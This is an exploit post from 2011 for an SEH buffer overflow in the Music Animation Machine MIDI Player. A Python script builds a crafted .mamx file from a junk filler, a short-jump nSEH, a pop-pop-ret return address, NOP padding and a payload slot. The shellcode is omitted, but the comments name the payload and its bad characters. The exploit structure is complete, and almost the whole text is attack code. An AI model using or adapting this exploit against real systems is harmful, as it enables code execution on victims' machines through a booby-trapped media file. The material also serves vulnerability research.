Music Animation Machine MIDI Player SEH Buffer Overflow
Posted on 05 January 2011
# Exploit Title: Music Animation Machine MIDI Player MAMX SEH BOF
# Date 1/4/2011
# Author: Acidgen mailto:spam(a t h)grayhat.se
# Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
# Version: 2006aug19 Release 035
# Tested on: Windows XP SP2 SE (Virtualbox Version: 3.2.10 Build:r66523)
# Credits go to c0d3R'Z, without his released MIDI POC/DoS
# (http://www.exploit-db.com/exploits/15897/)
# I wouldn't have found this app to play with in the first place.

#!/usr/bin/python

# Filler in front of the overwritten SEH record
junk = b'\x41' * 112
# Written first, so it lands in the "next SEH" field: EB 06 is a short
# jump forward over the 4-byte handler pointer that follows it
seh = b'\xeb\x06\x90\x90'
# NOP padding around the payload
pad = b'\x90' * 10
# Trailing filler that makes the file long enough to overrun the buffer
junk2 = b'\x42' * 9496

# Sorry for this quick and dirty one;
# CALL DWORD PTR SS: EBP+C @ VBOXMRXN.DLL
# When in Doubt, find your own pop,pop,ret
# VBOXMRXN.DLL Virtualbox Version: 3.2.10 Build:r66523
# Written second, so it lands in the handler-pointer field
# (0x1001BDE5, little-endian)
nseh = b'\xe5\xbd\x01\x10'

# msfpayload windows/messagebox
# badchars \x00\xff\x1a\x0d\x0a\x09\x0b\x0c\x20
# [*] x86/shikata_ga_nai succeeded with size 364 (iteration=1)
# (encoded payload bytes omitted)
pl = b""

# File layout: filler, SEH record (two fields), NOPs, payload, NOPs, filler
buff = junk + seh + nseh + pad + pl + pad + junk2

try:
    filename = "crash.mamx"
    print("[-]Music Animation Machine MIDI Player mamx SEH BOF...")
    print("[-]Version:035 Release name: MAMPlayer2006-aug-19_035")
    print("[-]Author: Acidgen ")
    print("[*]Generating crashfile:" + filename)
    # Binary mode so the bytes are written exactly as built
    with open(filename, "wb") as f:
        f.write(buff)
    print("[*]Done ")
except IOError:
    print("[X]Error...")